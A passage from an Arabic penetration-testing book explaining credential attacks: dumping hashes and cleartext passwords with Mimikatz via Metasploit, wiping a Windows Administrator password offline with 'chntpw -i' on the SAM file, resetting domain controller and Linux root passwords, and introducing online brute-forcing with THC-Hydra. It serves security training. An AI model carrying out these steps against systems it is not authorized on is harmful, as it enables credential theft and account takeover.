Metasploitﯾوﻓر ﻟﻧﺎ ﺑﻌض اﻷواﻣر اﻟﻣﺿﻣﻧﺔ اﻟﺗﻲ ﺗﻌرض ﻟﻧﺎ اﻟﻣﯾزة اﻷﻛﺛر ﺷﯾوﻋﺎ ﻓﻲ اﻻﺳﺗﺧدام ﻟل ، Mimikatzوﺗﻔرﯾﻎ اﻟﮭﺎش ووﺛﺎﺋﻖ
اﻟﺗﻔوﯾض ﻓﻲ ﻧص واﺿﺢ ) (dumping hashes and clear text credentials straightﻣﺑﺎﺷرة ﻣن اﻟذاﻛرة .وﻣﻊ ذﻟك ،ﻓﺈن اﻻﻣر
" "mimikatz_commandﯾﺗﯾﺢ ﻟﻧﺎ اﻟوﺻول اﻟﻛﺎﻣل إﻟﻰ ﻛﺎﻓﺔ ﻣﻣﯾزات ﻓﻲ .Mimikatz
ﯾﻣﻛﻧﻧﺎ اﺳﺗﺧدام ﻛﻼ ﻣن اﻷواﻣر اﻟﻣدﻣﺟﺔ ﻣن ﻗﺑل metasploitواواﻣر Mimikatzﻻﺳﺗﺧراج اﻟﮭﺎش و clear-text credentialsﻣن
اﻟﺟﮭﺎز اﻟﮭدف.
ﺑﻌد اﺳﺗﺧدام اﻻﻣر msvﯾﻌطﯾك ﻗﺎﺋﻣﮫ ﺑﮭﺎش ﻛﻠﻣﺔ اﻟﻣرور .ھﻧﺎ ﯾﻣﻛﻧك اﻧﺗزاع اﻟﮭﺎش وﻣﺣﺎوﻟﺔ ﻛﺳره ،أو ﺗﺷﻐﯾﻠﮫ ﻣن ﺧﻼل ﺟدول rainbow
tableﻋﻠﻰ اﻻﻧﺗرﻧت ،وﻟﻛن ﻣﺎذا ﻟو ﻟم ﯾﻛن ﻟدﯾﻧﺎ ھذا اﻟﻧوع ﻣن اﻟوﻗت؟
ﺳﯾﻛون ﻣن اﻟﺟﻣﯾل ﻓﻘط اﻟﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﻣرور ﻓﻲ ﻧص ﻋﺎدي.
ﺣﺳﻧﺎ ﯾﻣﻛن ذﻟك ،ﺣﯾث ﯾﻘوم ﻓﻘط اﻟﻣﺳﺗﺧدم ﺑﺗﺳﺟﯾل اﻟدﺧول إﻟﻰ اﻟﻧظﺎم ،ﺣﯾﻧﮭﺎ ﯾﻣﻛﻧك ﻛﺗﺎﺑﺔ اﻻﻣر .kerberos
ﻟدﯾك أﯾﺿﺎ " "livesspﺣﯾث ان اﻟﻌدﯾد ﻣن أﻧظﻣﺔ Win8ﺗﺳﺗﺧدم ﺣﺳﺎب اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻻﻋﺗﻣﺎد ﺗﺳﺟﯾل اﻟدﺧول اﻟﺧﺎﺻﺔ ﺑﮭم .ﻣﻊ
Mimikatzﯾﻣﻛﻧك اﻟﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮭم ﻋﻠﻰ ﺣد ﺳواء اﺳم اﻟﻣﺳﺗﺧدم وﻛﻠﻣﺔ اﻟﺳر ﻟﻠﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﺧﺎﺻﺔ ﺑﮭم
ﺑﺎﺳﺗﺧدام اﻣر واﺣد.
ﯾﻣﻛن أﯾﺿﺎ اﺳﺗﺧدام اﻻﻣر mimikatz_commandﻟﻠﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﻣرور ﺑطرﯾﻘﮫ ﻣﺗﻘدﻣﺔ
Password resettingھو أﺳﻠوب آﺧر اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﻠوﺻول إﻟﻰ اﻟﻧظﺎم أو ﻟﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات؛ وﻣﻊ ذﻟك ،ھذا اﻷﺳﻠوب ھو أﻗل
ﺑﻛﺛﯾر ﻣن ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور .ﻗد ﺗﻛون ﻓﻌﺎﻟﺔ ،ﻟﻛن ﯾﺟب أن ﺗﻛون ﻋﻠﻰ ﯾﻘﯾن ﻣن أن ﻣﺎﻟك اﻟﻧظﺎم واﻟﻣوظﻔﯾن ﺳوف ﯾﻌرﻓون ان ھﻧﺎك ﻣن
اﺳﺗوﻟﻰ ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﻣرور.
Password resettingھﻲ ﺗﻘﻧﯾﺔ ﺗﺳﻣﺢ ﻟﻣﮭﺎﺟم ﺑﺎﻟﻛﺗﺎﺑﺔ ﺣرﻓﯾﺎ ﻋﻠﻰ اﻟﻣﻠف SAMوإﻧﺷﺎء ﻛﻠﻣﺔ ﻣرور ﺟدﯾدة ﻷي ﻣﺳﺗﺧدم ﻋﻠﻰ ﻧظﺎم
وﯾﻧدوز اﻟﺣدﯾﺛﺔ .ﯾﻣﻛن ﺗﻧﻔﯾذ ھذه اﻟﻌﻣﻠﯾﺔ دون أن ﯾﻌرف ﻛﻠﻣﺔ اﻟﻣرور اﻷﺻﻠﯾﺔ ،ﻋﻠﻰ اﻟرﻏم ﻛﻣﺎ ذﻛرت ،ﻓﺈﻧﮭﺎ ﺗﺗطﻠب أن ﯾﻛون ﻟدﯾك اﻟوﺻول
اﻟﻔﻌﻠﻲ إﻟﻰ اﻟﺟﮭﺎز.
ﻛﻣﺎ ھو اﻟﺣﺎل ﻣﻊ ﺟﻣﯾﻊ اﻟﺗﻘﻧﯾﺎت اﻷﺧرى اﻟﺗﻲ ﻧوﻗﺷت ﻓﻲ ھذا اﻟﻛﺗﺎب ،ﻣن اﻟﻣﮭم أﯾﺿﺎ أن ﻧﻔﮭم اﻵﺛﺎر اﻟﻣﺗرﺗﺑﺔ ﻋﻠﻰ ھذه اﻟﺗﻘﻧﯾﺔ .ﺑﻣﺟرد ﺗﻐﯾﯾر
ﻛﻠﻣﺔ اﻟﻣرور ،ﻟن ﯾﻛون ھﻧﺎك أي وﺳﯾﻠﺔ ﻻﺳﺗﻌﺎدﺗﮭﺎ .ﻋﻧد إﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺔ اﻟﻣرور ،ﻓﻲ اﻟﻣرة اﻟﻘﺎدﻣﺔ ﯾﺣﺎول ﻣﺳﺗﺧدم اﻟدﺧول ﻓﯾرى أن ﺗم
ﺗﻐﯾﯾر ﻛﻠﻣﺔ اﻟﻣرور.
ﺑﻐض اﻟﻧظر ﻋن ھذا ،ﻓﮭذه ﻻ ﺗزال ﺗﻘﻧﯾﺔ ﻗوﯾﺔ ﺑﺷﻛل ﻻ ﯾﺻدق واﺣد ﯾﻣﻛن أن ﺗﻛون ﻣﻔﯾد ﺟدا ﻣن أﺟل اﻟوﺻول إﻟﻰ ﻧظﺎم .ﻟﺗﻧﻔﯾذ إﻋﺎدة ﺗﻌﯾﯾن
ﻛﻠﻣﺔ اﻟﻣرور ،وﺳوف ﺗﺣﺗﺎج إﻟﻰ ﺗﻣﮭﯾد اﻟﻧظﺎم اﻟﮭدف ﻣرة أﺧرى إﻟﻰ ﻛﺎﻟﻲ DVDأو ﻣﺣرك أﻗراص .ﺑﻣﺟرد اﻟدﺧول اﻟﻰ اﻟﻧظﺎم اﻟﺑدﯾل ،ﻣن
ﺧﻼل اﻟﺗرﻣﻧﺎل ،ﻓﺄﻧك ﺳوف ﺗﺣﺗﺎج إﻟﻰ ﺗﺣﻣﯾل ﻣﺣرك اﻷﻗراص اﻟﺛﺎﺑﺗﺔ اﻟﻔﻌﻠﯾﺔ ﻟﻠﻧظﺎم اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﻣﻠف .SAMﯾﻣﻛﻧك اﻟﻌﺛور ﻋﻠﻰ
اﻟﺗﻌﻠﯾﻣﺎت ﻟﺗﻧﻔﯾذ ھذه اﻟﻣﮭﻣﺔ ﻓﻲ ﻣﻘطﻊ ﺳﺎﺑﻖ ﺷرح ﻣن ﻗﺑل.
ﻣن ھﻧﺎ ،ﯾﻣﻛﻧك ﺗﺷﻐﯾل اﻷﻣر " "chntpwﻹﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺔ اﻟﻣرور .ﻟﻣراﺟﻌﺔ اﻟﺧﯾﺎرات اﻟﻛﺎﻣﻠﺔ واﻟﺗﺑدﯾل اﻟﻣﺗوﻓرة ،ﯾﻣﻛﻧك إﺻدار اﻷﻣر
][chntpw –h اﻟﺗﺎﻟﻲ:
اﻓﺗرض أﻧك ﺗرﯾد إﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺔ ﻣرور اﻟﻣﺳؤول ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف .ﻹﻧﺟﺎز ھذا ،ﯾﻣﻛﻧك إﺻدار اﻷﻣر اﻟﺗﺎﻟﻲ:
#chntpw©–i©/mnt/sda1/WINDOWS/system32/config/SAM
ﻓﻲ اﻷﻣر أﻋﻼه ،ﯾﺗم اﺳﺗﺧدام " "chntpwﻟﺑدء ﺑرﻧﺎﻣﺞ إﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺔ اﻟﻣرور .واﻟﺗﻌﺑﯾر “ "-iﯾﺳﺗﺧدم ﻟﺗﺷﻐﯾل اﻟﺑرﻧﺎﻣﺞ ﻓﻲ ﻗذﯾﻔﺔ ﺗﻔﺎﻋﻠﯾﮫ
) (interactiveﺣﯾث ﯾﺳﻣﺢ ﻟك اﺧﺗﯾﺎر اﺳم اﻟﻣﺳﺗﺧدم اﻟذي ﺗود إﻋﺎدة ﺗﻌﯾﯾﻧﮫ .و""mnt/sda1/WINDOWS/system32/config/SAM/
ھو اﻟﻣﺳﺎر اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﻣﻠف SAMﻓﻲ اﻟﺟﮭﺎز اﻟﮭدف.
ﺑﻌد ﺗﺷﻐﯾل اﻷﻣر ،ﺳﯾﺗم ﺗﻘدﯾﻣك اﻟﻰ ﺳﻠﺳﻠﺔ ﻣن اﻟﺧﯾﺎرات اﻟﻘﺎﺋﻣﺔ اﻟﺗﻲ ﻣن ﺷﺄﻧﮭﺎ أن ﺗﺳﻣﺢ ﻟك ﺑﺈﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺔ اﻟﻣرور ﻟﻠﻣﺳﺗﺧدم اﻟﻣطﻠوب.
ﻛل ﺧطوة ﻣن اﻟﺧطوات ﯾوﺿﻊ ﻣﻌﺎ وﺻف ﻟﮭﺎ؛ ﺑﺑﺳﺎطﺔ ﯾﺟب ﻋﻠﯾك اﺗﺧﺎذ ﺑﺿﻊ ﻟﺣظﺎت ﻟﻘراءة ﻣﺎ ھو ﻣطﻠوب .ﺗم ﺗﺻﻣﯾم اﻟﺑرﻧﺎﻣﺞ ﻓﻌﻼ ﻣﻊ
ﺳﻠﺳﻠﺔ ﻣن اﻹﺟﺎﺑﺎت "اﻻﻓﺗراﺿﯾﺔ" ﻓﻲ ﻣﻌظم اﻟﺣﺎﻻت ،ﯾﻣﻛﻧك ﺑﺑﺳﺎطﺔ اﻟﺿﻐط ﻋﻠﻰ ﻣﻔﺗﺎح "دﺧول" ﻟﻘﺑول اﻟﺧﯾﺎر اﻻﻓﺗراﺿﻲ.
ﻛﻣﺎ ھو ﻣﺑﯾن ﻓﻲ اﻟﺷﻛل اﻟﺗﺎﻟﻲ ،ﺑﻌد اﻟﺗﺣﻣﯾل اﻷداة ،ﺳﯾطﻠب ﻣﻧك اﻹﺟﺎﺑﺔ ﻋﻠﻰ ﻋدة أﺳﺋﻠﺔ.
اﻟﺳؤال اﻷول ﯾطﻠب ﻣﻧك ﻣﺎذا ﺗﻔﻌل "[1] What to do؟ " ﻓوق اﻟﺳؤال ،ﺳﺗﺷﺎھد ﺳﻠﺳﻠﺔ ﻣن اﻟﺧﯾﺎرات ﻟﻼﺧﺗﯾﺎر ﻣن ﺑﯾﻧﮭﺎ .ﺑﺑﺳﺎطﺔ إدﺧﺎل
اﻟرﻗم أو اﻟﺣرف اﻟذي ﯾﺗواﻓﻖ ﻣﻊ اﻟﺧﯾﺎر اﻟذي ﺗرﯾده ﺛم ﺗﻧﻘر ﻋﻠﻰ اﻟﻣﻔﺗﺎح " "Enterﻟﻠﻣﺗﺎﺑﻌﺔ .و"] "[1ﺑﻌد اﻟﺳؤال ﯾﺷﯾر إﻟﻰ أن اﺧﺗﯾﺎر " "1ھو
اﻻﺧﺗﯾﺎر اﻻﻓﺗراﺿﻲ.
ﻓﻲ ﻣﺛﺎﻟﻧﺎ ھذا ،ﻧﺣن ﻧﺧطط ﻹﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺔ اﻟﻣرور ﻟﺣﺳﺎب اﻟﻣﺳؤول ،وﺣﺗﻰ ﻧﺗﻣﻛن ﻣن ھذا ﻧﻛﺗب ] [1او ﻧﻧﻘر ﻓوق Enterﻟﻘﺑول اﻻﻋداد
اﻻﻓﺗراﺿﻲ .اﻟﺧطوة اﻟﺗﺎﻟﯾﺔ ﯾﻘدم ﻟﻧﺎ ﻗﺎﺋﻣﺔ ﺑﺄﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن اﻟﻣﺗوﻓرة ﻋﻠﻰ اﻟﺟﮭﺎز Windowsاﻟﻣﺣﻠﻲ .ﯾﻣﻛﻧك ﺗﺣدﯾد اﻟﻣﺳﺗﺧدم اﻟﻣطﻠوب
ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﺳم اﻟﻣﺳﺗﺧدم ﻛﻣﺎ ھو ﻣﻌروض .ﻣرة أﺧرى ،ﺳوف ﻧﺳﺗﺧدم اﻟﺧﯾﺎر اﻻﻓﺗراﺿﻲ " ."Administratorﯾﺑﯾن اﻟﺷﻛل ﻟﻘطﺔ ﻣن
اﻟﻣﺳﺗﺧدﻣﯾن اﻟﻣﺗﺎﺣﯾن.
اﻟﺧطوة اﻟﺗﺎﻟﯾﺔ ،ﯾﻘدم ﻟﻧﺎ ﻣﺧﺗﻠف اﻟﺧﯾﺎرات ﻟﺗﺣرﯾر اﺳم اﻟﻣﺳﺗﺧدم ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف ﻛﻣﺎ ھو ﻣﺑﯾن ﻓﻲ اﻟﺷﻛل اﻟﺗﺎﻟﻲ .ﯾرﺟﻰ ﻣﻼﺣظﺔ أﻧﮫ ﻓﻲ
ھذه اﻟﺧطوة ،ﻓﺈﻧك ﻟن ﺗرﻏب ﻓﻲ ﻗﺑول اﻟﺧﯾﺎر اﻻﻓﺗراﺿﻲ!
ﺑدﻻ ﻣن ﻗﺑول اﻟﺟواب اﻻﻓﺗراﺿﻲ ﻟﮭذه اﻟﺷﺎﺷﺔ ،ﻓﮭﻧﺎ ﺑﻌد ﺗﺣدﯾد اﻟﺧﯾﺎر " " 1واﻟﺗﻲ ﺗﻌﻧﻰ ﻣﺳﺢ ﻛﻠﻣﺔ اﻟﻣرور .ﻓﺑﻌد اﺧﺗﯾﺎرك اﻻﺧﺗﯾﺎر ][1
واﻟﻧﻘر ﻋﻠﻰ Enterواﻻﻧﺗﮭﺎء ﻣن ﻣﺳﺢ ﻛﻠﻣﺎت اﻟﻣرور ،ﻓﺳوف ﺗﺣﺻل ﻋﻠﻰ رﺳﺎﻟﺔ "!password cleared " :ﻋﻧد ھذه اﻟﻧﻘطﺔ ،ﯾﻣﻛﻧك
إﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﻣﺳﺗﺧدم آﺧر أو إدﺧﺎل اﻟرﻣز ]![ ﻹﻧﮭﺎء اﻟﺑرﻧﺎﻣﺞ .ﻣن اﻟﻣﮭم إﻛﻣﺎل اﻟﺧطوات اﻟﻣﺗﺑﻘﯾﺔ ﻷﻧﮫ ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ
ﻟم ﯾﺗم ﻛﺗﺎﺑﺔ ﻣﻠف SAMاﻟﺟدﯾدة ﻋﻠﻰ اﻟﻘرص اﻟﺻﻠب .ﻓﻲ اﻟﻘﺎﺋﻣﺔ اﻟﺗﻲ ﺗﻠﯾﮭﺎ ،أدﺧل " " qﻹﻧﮭﺎء اﻟﺑرﻧﺎﻣﺞ .واﻟﺗﻲ ﺗؤدى اﻟﻰ ظﮭور رﺳﺎﻟﺔ
ﺗﺳﺄﻟك ﻋﻣﺎ إذا ﻛﻧت ﺗرﻏب ﻓﻲ إرﺳﺎل اﻟﺗﻐﯾﯾرات إﻟﻰ اﻟﻘرص اﻟﺻﻠب .ﺗﺄﻛد ﻣن إدﺧﺎل " " yﻓﻲ ھذه اﻟﺧطوة ﺣﯾث أن اﻻﺧﺗﯾﺎر اﻻﻓﺗراﺿﻲ ھﻧﺎ
).(n
ﻗد ﺗم اﻵن ﻣﺳﺢ ﻛﻠﻣﺔ اﻟﺳر ﻟﻠﻣﺳﺗﺧدم اﻟذي اﺧﺗﯾر وأﺻﺑﺢ ﻓﺎرغ .ﯾﻣﻛﻧك إﯾﻘﺎف ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﻣؤﻗت ﻛﺎﻟﻲ ﺑﺈﺻدار اﻷﻣر " " reboot
وإﺧراج .DVDﻋﻧد إﻋﺎدة ﺗﺷﻐﯾل ، Windowsﯾﻣﻛﻧك ﺗﺳﺟﯾل اﻟدﺧول إﻟﻰ اﻟﺣﺳﺎب ﻣن ﺧﻼل ﺗرك ﻛﻠﻣﺔ اﻟﻣرور ﻓﺎرﻏﺔ.
ﻣﻊ اﻟﻘﻠﯾل ﻣن اﻟﻣﻣﺎرﺳﺔ ،ﻓﺎن ھذه اﻟﻌﻣﻠﯾﺔ ﺑرﻣﺗﮭﺎ ،ﺑﻣﺎ ﻓﻲ ذﻟك ﺗﻣﮭﯾد ﻛﺎﻟﻲ ،وﺗطﮭﯾر ﻛﻠﻣﺔ اﻟﺳر ،واﻟﺣﺎﺟﺔ إﻟﻰ وﯾﻧدوز ،وﯾﻣﻛن اﻻﻧﺗﮭﺎء ﻣﻧﮭﺎ ﻓﻲ
أﻗل ﻣن 5دﻗﺎﺋﻖ.
Windows domain controllersﻻ ﺗﺧزن ﻛﻠﻣﺎت اﻟﺳر اﻟﺧﺎﺻﺔ ﺑﺎﻟﻣﺳﺗﺧدﻣﯾن ﻓﻲ اﻟﻣﻠف ، SAMوإﻧﻣﺎ ﻓﻲ .Active Directory
Active Directoryﻻ ﯾﻣﻛن ﺗﺣرﯾره ﯾدوﯾﺎ ) ، (offlineﺑﺣﯾث ﯾﺗم اﺗﺧﺎذ ﻧﮭﺞ ﻣﺧﺗﻠف ﻹﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺔ اﻟﻣرور .ﯾﻣﻛن ﺗﺷﻐﯾل وﺣدة ﺗﺣﻛم
اﻟدوﻣﯾن Windows domain controllersدون ﺧدﻣﺔ Active Directoryوﺗﺳﻣﻰ ).(Active Directory Restore Mode
وﻋﺎدة ﻣﺎ ﯾﺗم ذﻟك ﻟﺻﯾﺎﻧﺔ Active Directoryأو .defragmentationﻋﻧدﻣﺎ ﻟم ﯾﺗم ﺗﺣﻣﯾل ،Active Directoryﻓﺎن وﺣدة ﺗﺣﻛم
اﻟدوﻣﯾن ) (Windows domain controllersﺗﻌود ﻣؤﻗﺗﺎ إﻟﻰ ﻣﺻﺎدﻗﺔ اﻟﻣﺳﺗﺧدم اﻟﻣﺣﻠﻲ وﺳوف ﺗﺳﺗﺧدم ﻣرة أﺧرى اﻟﻣﻠف SAM
اﻟﻣوﺟودة ﻋﻠﻰ اﻟﺟﮭﺎز .وﻋﻧدھﺎ ﻣن اﻟﻣﻣﻛن إﻧﺷﺎء ھﺟوم ﻣﺣﺗﻣل ﻣﺗﺟﮫ ﯾﻛون ﻹﻋﺎدة /ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور ﻟﻠﻣﺳؤول اﻟﻣﺣﻠﻲ ﻟوﺣدة ﺗﺣﻛم اﻟدوﻣﯾن
)ﻋن طرﯾﻖ اﻟﺗﻼﻋب SAMأو (dumpingوﻣن ﺛم ﺗﺣﻣﯾل ھذا اﻻﻣر اﻟﻰ Active Directoryاﻟﻣوﺟود ﻓﻲ اﻟوﺿﻊ Restore Mode
وﺗﺳﺟﯾل اﻟدﺧول ﻣﻊ ﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﻌدﻟﺔ او اﻟﻣﻛﺳورة .ﺑﻣﺟرد ﺗﺳﺟﯾل اﻟدﺧول ،ﯾﺗم ﺗﺛﺑﯾت ﺧدﻣﺔ اﻟﺗﻲ ﺗﻧﻔذ اﻷﻣر ) net userﻣﻊ اﻣﺗﯾﺎزات
.(SYSTEMوﺑﻣﺟرد إﻋﺎدة ﺗﺷﻐﯾل وﺣدة ﺗﺣﻛم اﻟدوﻣﯾن ﻓﺎن ﯾﺳﻣﺢ ﺑﺗﺣﻣﯾل ،Active Directoryوھﻧﺎ ﺗﻘوم اﻟﺧدﻣﺔ ﺑﺈﺿﺎﻓﺔ او ﺗﻌدﯾل
اﻟﻣﺳﺗﺧدﻣﯾن وﺗﺳﻣﺢ ﻟك ﺑﺎﻟدﺧول ﺑﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﻲ ﺗم ﺗﻐﯾرھﺎ .ﻟﻣزﯾد ﻣن اﻟﻣﻌﻠوﻣﺎت ﯾﻣﻛﻧك زﯾﺎرة اﻟراﺑط اﻟﺗﺎﻟﻲ:
http://www.nobodix.org/seb/win2003_adminpass.html
Resetting Linux Systems
ﻓﻲ ﻟﯾﻧﻛس ،ﯾﺗم اﺳﺗﺧدام ﺗﻘﻧﯾﺔ ﻣﻣﺎﺛﻠﺔ ﻹﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺎت اﻟﻣرور .rootﯾﺗم إﻋﺎدة ﺗﺷﻐﯾل اﻟﺟﮭﺎز إﻣﺎ ﻓﻲ single modeأو ﺗﺷﻐﯾل ﻣن ﻧظﺎم
ﺗﺷﻐﯾل آﺧر .ﻟﻣزﯾد ﻣن اﻟﻣﻌﻠوﻣﺎت ﺣول ھذا ﯾﻣﻛن اﻻطﻼع ﻋﻠﻰ اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ:
http://linuxgazette.net/107/tomar.html
اﻻن وﻗد ﺳردﻧﺎ اﻟﻌدﯾد ﻣن اﻟﺗﻘﻧﯾﺎت اﻟﻣﻌﺗﻣدة ﻓﻲ اﻟﺣﺻول ﻋﻠﻰ اﻟﮭﺎش اﻟﺧﺎص ﺑﻛﻠﻣﺔ اﻟﻣرور ﻟﻛﺳرھﺎ واﻻن ﻧﻧﺗﻘل اﻟﻰ ﺟزء اﺧر واﻟذي ﯾﺿم
اﻟﻌدﯾد ﻣن اﻷدوات وھو .Online Password Attack
ﻋﻧد اﺳﺗﻌراض ﻧﺎﺗﺞ اﻟﺧطوة اﻟﺛﺎﻧﯾﺔ ) ،(Footprintingﻓﯾﺟب ﻋﻠﯾك داﺋﻣﺎ وﺿﻊ ﻣﻼﺣظﺎت ﺧﺎﺻﺔ ﻋن ﺑروﺗوﻛول اﻹﻧﺗرﻧت ) (IPﻟﻠﻌﻧﺎوﯾن
اﻟﺗﻲ ﺗﺗﺿﻣن ﻧوع ﻣن ﺧدﻣﺔ اﻟوﺻول ﻋن ﺑﻌد .ﻣﺛل) ، (FTP)،Telnet ، (SSHﺑرﻧﺎﻣﺞ ،VNC ، PCAnywhereوﺑروﺗوﻛول ﺳطﺢ
اﻟﻣﻛﺗب اﻟﺑﻌﯾد ) (remote desktop protocolھﻲ اﻟﺧﯾﺎرات اﻷﻛﺛر ﺷﻌﺑﯾﺔ ﻷن اﻟوﺻول إﻟﻰ ھذه اﻟﺧدﻣﺎت ﻓﻲ ﻛﺛﯾر ﻣن اﻷﺣﯾﺎن ﯾؤدي إﻟﻰ
اﻟﺳﯾطرة اﻟﻛﺎﻣﻠﺔ ﻟﺟﮭﺎز اﻟﮭدف .ﻋﻧد اﻛﺗﺷﺎف واﺣدة ﻣن ھذه اﻟﺧدﻣﺎت ،ﻓﺎن اﻟﻣﺗﺳﻠﻠﯾن ﺗﺗﺣول ﻋﺎدة إﻟﻰ ".“ Online Password Attack
وﻟﻐرض ھذا اﻟﻛﺗﺎب ،ﻓﺳوف ﻧﻘوم ﺑﺗﻌرﯾف " " Online Password Attackﻋﻠﻰ أﻧﮫ ﺗﻘﻧﯾﺔ ھﺟوم واﻟﺗﻲ ﺗﺗﻔﺎﻋل ﻣﻊ ﺧدﻣﮫ ﺗﻌﻣل اﻻن
" "live serviceﻣﺛل SSHأو Online Password Attack .Telnetﺗﻌﻣل ﻣن ﺧﻼل ﻣﺣﺎوﻟﺔ brute force Attackﻹﯾﺟﺎد
طرﯾﻘﮫ إﻟﻰ اﻟﻧظﺎم ﻣن ﺧﻼل ﻣﺣﺎوﻟﺔ اﺳﺗﺧدام ﻗﺎﺋﻣﺔ ﺷﺎﻣﻠﺔ ﻟﻛﻠﻣﺎت اﻟﺳر وأﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن أو ﺗرﻛﯾﺑﺎت .ﻓﻲ اﻟﻣﻘﺎﺑل ،ﺣﺎﻟﯾﺎ ﺗﻘﻧﯾﺎت ﻛﺳﯾر ﻛﻠﻣﺔ
اﻟﻣرور ) (Offline Password Attackﻻ ﺗﺗطﻠب ان ﺗﻛزن اﻟﺧدﻣﺔ ﻗﯾد اﻟﺗﺷﻐﯾل.
ﻋﻧد اﺳﺗﺧدام ،Online Password Crackerﻓﺎن إﻣﻛﺎﻧﯾﺔ اﻟﻧﺟﺎح ﯾﻣﻛن ان ﺗزﯾد ﺑﻧﺳﺑﮫ ﻛﺑﯾره إذا ﻗﻣت ﺑﺿم ھذا اﻟﮭﺟوم ﻣﻊ اﻟﻣرﺣﻠﺔ
اﻷوﻟﻰ واﻟﺗﻲ ﯾﺗم ﻓﯾﮭﺎ ﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت ﻓﻲ اﻟﺧطوة .1ﻋﻠﻰ وﺟﮫ اﻟﺗﺣدﯾد ﯾﺟب أن ﺗﺗﺄﻛد ﻣن أﻧﮭﺎ ﺗﺣﺗوي ﻋﻠﻰ أي ﻣن أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن أو
ﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ اﻛﺗﺷﻔت .ﻋﻣﻠﯾﺔ ﻛﺳﯾر ﻛﻠﻣﺔ اﻟﻣرور ﻋﺑر اﻹﻧﺗرﻧت ) (Online Password Crackerﺗﺗطﻠب ﺣرﻓﯾﺎ ﺑراﻣﺞ اﻟﮭﺟوم
ﻹرﺳﺎل اﺳم ﻣﺳﺗﺧدم وﻛﻠﻣﺔ ﻣرور ﻟﻠﮭدف .ﻓﺈذا ﻛﺎن إﻣﺎ اﺳم اﻟﻣﺳﺗﺧدم أو ﻛﻠﻣﺔ اﻟﻣرور ﻏﯾر ﺻﺣﯾﺣﺔ ،ﺳﯾﺗم ﻋرض رﺳﺎﻟﺔ ﺧطﺎ ﻣن ﻗﺑل ﺑرﻧﺎﻣﺞ
اﻟﮭﺟوم وﺳﺗﻔﺷل ﺗﺳﺟﯾل اﻟدﺧول .ﺛم ﺑﻌد ذﻟك ﯾﻘوم ﺑﺎرﺳﺎل ﺗرﻛﯾﺑﺔ ﻣن اﺳم ﻣﺳﺗﺧدم وﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﺎﻟﯾﺔ .وﺗﺳﺗﻣر ھذه اﻟﻌﻣﻠﯾﺔ ﺣﺗﻰ ﯾﻧﺟﺢ
اﻟﺑرﻧﺎﻣﺞ ﻓﻲ اﻟﻌﺛور ﻋﻠﻰ ﺗﺳﺟﯾل اﻟدﺧول/ﻛﻠﻣﺔ ﻣرور اﻟﺻﺣﯾﺣﺔ أو أﻧﮫ ﯾﻧﮭﻰ ﻛل اﻟﺗﺧﻣﯾﻧﺎت ﺑدون إﯾﺟﺎد ﺷﻲء .ﻋﻠﻰ اﻟﻌﻣوم ،ﻋﻠﻰ اﻟرﻏم ﻣن أن
أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر ﻣﮭﯾﺋﮫ ﻟﻣﺛل ھذه ﻣن اﻟﻣﮭﺎم اﻟﻣﺗﻛررة ،وﻟﻛن ھذه اﻟﻌﻣﻠﯾﺔ ﺑطﯾﺋﺔ ﻧوﻋﺎ ﻣﺎ.
ﻓﻲ ھذه اﻟﺟزء ﺳوف ﻧﺳﺗﺧدم ) .THC-Hydra password cracker (Hydraھﻧﺎك أوﻗﺎت اﻟﺗﻲ ﺳﯾﻛون ﻟدﯾﻧﺎ اﻟوﻗت ﻟﻣﮭﺎﺟﻣﺔ ﺟﮭﺎز
ﻛﻣﺑﯾوﺗر ﯾﻌﻣل ﺑﻧظﺎم اﻟﺗﺷﻐﯾل Windowsﻣﺑﺎﺷرة ) (physical attackواﻟﺣﺻول ﻋﻠﻰ اﻟﻣﻠف ) (SAMﻣﺑﺎﺷرة .وﻣﻊ ذﻟك ،ﺳوف ﯾﻛون
ھﻧﺎك أﯾﺿﺎ اﻟوﻗت اﻟذي ﻧﺣن ﻧﻛون ﻓﯾﮫ ﻏﯾر ﻗﺎدرﯾن ﻋﻠﻰ اﻟﻘﯾﺎم ﺑذﻟك ،وھذا ھو اﻟﻣﻛﺎن اﻟذي ﯾﺛﺑت ﻓﯾﮫ ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر ﻋﺑر ﺷﺑﻛﺔ اﻹﻧﺗرﻧت
) (Online Password Attackاﻷﻛﺛر ﻓﺎﺋدة.
